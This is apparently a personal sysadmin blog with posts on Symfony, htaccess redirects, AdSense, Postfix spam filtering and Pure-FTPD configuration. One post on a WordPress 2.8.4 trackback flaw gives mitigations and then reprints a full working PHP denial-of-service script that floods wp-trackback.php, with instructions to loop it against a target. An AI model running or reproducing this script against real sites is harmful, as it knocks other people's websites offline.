Custom default values in Symfony 1.4
Hey everyone, it’s been a while.
Lately I’ve started to dig into the php web framework Symfony. I have to say I’m very impressed. It makes building web applications fun again. Adding new features and expanding on current features become very easy.
For my day job as a system admin I’ve been deploying Symfony applications for years, but haven’t been involved with them more than. I’m very glad I finally made the plunge into Symfony myself. After a couple days of banging my head against the wall, slowly climbing the learning curve, things finally started falling in place. And since then I feel my time coding is much more efficient.
Anyways, I had some issues finding solutions to some simple problems, one of them being setting up default values.
In your config/doctrine/schema.yml file you can set models to be timestampable:
Category:
actAs: { Timestampable: ~ }
This is a nice and simply way to maintain a created_at and updated_at field. I quickly found out though, that updated_at isn’t just when you edit the file in the backend, but anytime something changes. Which makes sense, but wasn’t what I first assumed.
One of my websites tracks a lot of activity, and the updated_at was a bit heavier than I was looking for. Extra queries can quickly build up and start slowing down your website. I ended up removing the Timestampable option, and instead used a column:
column:
added: { type: date }
Now in order to automatically update the added field only when the entry is created, edit or create the following file using your model name:
lib/model/doctrine/Category.class.php
class Category extends BaseCategory
{
public function assignDefaultValues($overwrite = false)
{
parent::assignDefaultValues($overwrite);
$this->added = date('Y-m-d');
}
}
What this does is set the value of added to the current date in the 2011-04-12 format.
In the assignDefaultValues you can set any defaults you like, in the same format as the date is set.
This is very simple to setup when you know how to, but finding out how to set these defaults isn’t as easy as it could be.
I hope this simple post helps some people figure this simple solution out quicker than it took me.
Google Instant – Good or Bad for SEO?
After the recent changes today to Google’s search results, Google Instant, it got me thinking how it’s going to affect SEO.
I think that the long tail keywords will be affected the most. For example when someone who would normally search for “arcade games to play” may end up seeing the results for “arcade games” and click on one of those.
This could come into play a lot more when you’re not quite sure what you’re searching for, and a 2 keywords finds what you would have previously found with 4 or so. Only time will tell how this works out in the long run.
I’d be happy to hear your thoughts on the matter.
Google AdSense Page RPM
I just noticed the daily earnings report for Google AdSense have changed a bit. I’ve done some searching and not able to find out what Page RPM is. Is it just the a new way of saying eCPM? Someone must know out there. I’d be curious to hear your comments on it.
Edit: Turns it it’s revenue per thousand. Just another way to say eCPM I believe.
Thanks!
Redirect to www with htaccess
Posted by steve in General, Search Engine Optimization, Webmaster on March 23, 2010
Many webmasters don’t take any steps to ensure their website is accessed with http://www.example.com and not http://example.com. One reason to do this can include the presentation of your site in Google’s search results. Another reason is when you don’t control what address is presented, Google will make the decision for you. This can lead to issues with duplicate content, splitting of page rank and other SEO benefits, along with confusion when monitoring results in tools like Google Webmaster Tools.
When a person links to your site, they may simple link to http://example.com. Another person may link to http://www.example.com. This would be like looking at money.cnn.com vs www.cnn.com. Google treats these as different websites and can be harmful to the overall rankings for your site. It is generally a good idea to decide if you want to redirect non www to www.
The solution to this is a rather easy htaccess rule. To setup a htaccess rule you would create a file called .htaccess
in the root folder of your website, sometimes referred to public_html/, or htdocs/.
To enable mod_rewrite, enter this line first if it doesn’t exist already:
RewriteEngine on
Then you would put this below:
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
The first line reads the HTTP_HOST, and determines of the first 3 characters are www or not. If they are not, it continues onto the second line.
The second line takes the HTTP_HOST requested initially, and simply adds www. to it. The R=301 says that this is a HTTP code 301 permanent redirect, and the L tells the code to stop the rewriting process here and don’t apply any more rewrite rules.
To sum it up, a simple .htaccess
file to redirect non www to www would be:
RewriteEngine on
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
It is also possible to redirect www.example.com to example.com. The code below will do that:
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
I hope this simple mod_rewrite rule will help when you decide to redirect non www urls to www, or the other way around.
Prevent Smart Pricing
Whether you know it or not, there is a penalty in place by Google for publishers who don’t convert well for advertisers. The term used to describe this penalty is “smart pricing”. While the information Google provides on this is very sparse and generally not very helpful, some research has been conducted to get more information.
The general definition of smart pricing is when you earn a very small amount per click. Many times much lower than expected, or you previously earned. The penalty has been reported upwards of 90% loss in earnings per click. Often you can even go through your adsense earning history to find when it happened, as it’s quite apparent when you know what you are looking for.
If you are a “victim” of smart pricing it can be very frustrating trying to work your way out of it. When I put victim in quotes, I mean that many webmasters, whether they know it or not, get themselves into the situation. Although this isn’t always the case.
One industry I have experience in is the proxy industry. There are many people that do anything they can to ‘trick’ users into clicking on ads. Many times you will find that many webmasters who run proxy sites many times implement questionable tactics. In the short term this may increase your revenue, as you’re sending more clicks Google’s way. But in the long run, it will get you smart priced. Google will see that the clicks coming from your site are not converting, and are of overall low quality (bounce rate, time on site, etc).
What should you do to prevent being smart priced, or even fix it if it happens? Well it’s simple, rearrange your sites to still clearly display ads to users, but let them choose to click them. This will help you send only interested visitors to Google’s ad network. Rumor has it that smart pricing is re-evaluated near weekly.
Now, keep in mind that all this information is just what I’ve gained from experience. It is by no way dead facts, but it makes sense to me. I’d appreciate any thoughts on the matters in the comments. Now go make that money!
Help Fill Food Shelves
Kare 11 & Land O’Lakes are donating $1 for every person who clicks on their web site. Go to the website listed below and in the upper right corner you will see a small banner: You Click, We Donate . Just simply click on that banner. It’s that easy.
http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx
All it takes is a few seconds, and the money generated can go a long way to help people in need.
It Wasn’t Me
I noticed a spike in traffic yesterday and wondered what the heck was going on. I looked more into it and found out someone with the same name as me had charges filed against them for Conspiracy to Commit Securities Fraud.
More information can be found here: http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna
I’d just like to say that if you made it here searching for that guy, I’m not him.
I’m a 24 (25 in a couple days) year old IT geek from Minnesota, not a manager for a hedge fund committing suspected insider trading.
New 0-Day WordPress 2.8.4 Exploit
WordPress is vulnerable to a very dirty exploit right now as of 2.8.4. There’s a resource exhaustion DoS that is floating around the public right now. It’s a vulnerability in wp-trackbacks.php that hurts.
Here’s the results from a quick test against my server:
13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24
Very dirty.
Here’s a temporary fix that can be implemented until we get a real patch.
Add the following lines to your Apache 2 config file:
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
This should be placed in the main config, not a virtual hosts config. This will disable any URLs with “wp-trackback.php” in it. This is a quick and ugly fix, but will help against this attack.
I expect WordPress will have an update soon.
UPDATE: With the help of a friend we have created a quick fix:
In line #47 of wp-trackback.php, add this:
if(strlen($charset) > 50)
die;
Here’s the actual exploit.
<?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* [email protected] contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) < 2)
die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
$path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
$fp = @fsockopen($data['host'],80);
if(!$fp)
die("unable to connect to: ".$data['host']."\n");
$pid[$n] = pcntl_fork();
if(!$pid[$n]){
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n");
echo "hit!\n";
}
}
?>
Postfix Maildrop Spam Folder
Filtering spam in Postfix is pretty simple. There’s some advanced techniques you can use, but simply setting up Spamassassin will suit many people. One downside is seeing all the ***** SPAM ***** mails in your inbox. It took a while to come up with a solution, but the best fit so far has been implementing Maildrop to automatically move those files to a Junk folder. Here’s the steps to set this up on a Debian 5.0 system with Postfix and Spamassassin.
First, setup your /etc/maildroprc file:
# commands and variables for making the mail directories maildirmake=/usr/bin/maildirmake mkdir=/bin/mkdir rmdir=/bin/rmdir MAILDIR=$DEFAULT # make the user's mail directory if it doesn't exist `test -e $MAILDIR` if ($RETURNCODE != 0) { `$mkdir -p $MAILDIR` `$rmdir $MAILDIR` `$maildirmake $MAILDIR` } # make the .Junk folder if it doesn't exist JUNK_FOLDER=.Junk _JUNK_DEST=$MAILDIR/$JUNK_FOLDER/ `test -d $_JUNK_DEST` if ($RETURNCODE != 0 ) { `$maildirmake $_JUNK_DEST` #auto subscribe. the following works for courier-imap `echo INBOX.Junk >> $MAILDIR/courierimapsubscribed` } # If the Spam-Flag is set, move the mail to the Junk folder if (/^X-Spam-Flag:.*YES/) { exception { to $DEFAULT/.Junk/ } }
The comments clearly state what’s going on there.
Once that’s setup, you will go into your /etc/postfix/master.cf and make sure the
maildrop unix - n n - - pipe flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
is not commented out.
Next you will have to set the /usr/bin/maildrop file setuid root. This is so maildrop can interact with authdaemon and the mail folders.
#chmod +s /usr/bin/maildrop
Then you have to add this to your /etc/postfix/main.cf file:
virtual_transport = maildrop maildrop_destination_recipient_limit = 1
If there is another virtual_transport line, be sure to comment that out first.
Last, set the permissions on the authdaemon so that maildrop can access it.
chown vmail /var/run/courier/authdaemon
And that’s all. Nice and simple way to handle all that Junk mail.
Debian Pure-FTPD Virtual Users Howto
After being a dedicated Gentoo user, I’ve recently moved over to Debian. Hoping to work more on productive tasks, than just administrating my servers. In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different than Gentoo.
I thought I’d write up a quick how to on how to configure Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in hope someone else will be able to put it to use. And here we go..
Enable PureDB authentication:
# cd /etc/pure-ftpd/auth
# ln -s ../conf/PureDB 50pure
To disable PAM authentication and UNIX authentication so you only have virtual users:
# echo no > /etc/pure-ftpd/conf/PAMAuthentication
# echo no > /etc/pure-ftpd/conf/UnixAuthentication
That’s it. Simple, but when coming from a single config file, this isn’t at all intuitive – at least to me.
I’ve always recommended Pure-FTPD for it’s security, features, and simplicity. You can find out more information at the official Pure-FTPD projects website: www.Pure-FTPD.org
Social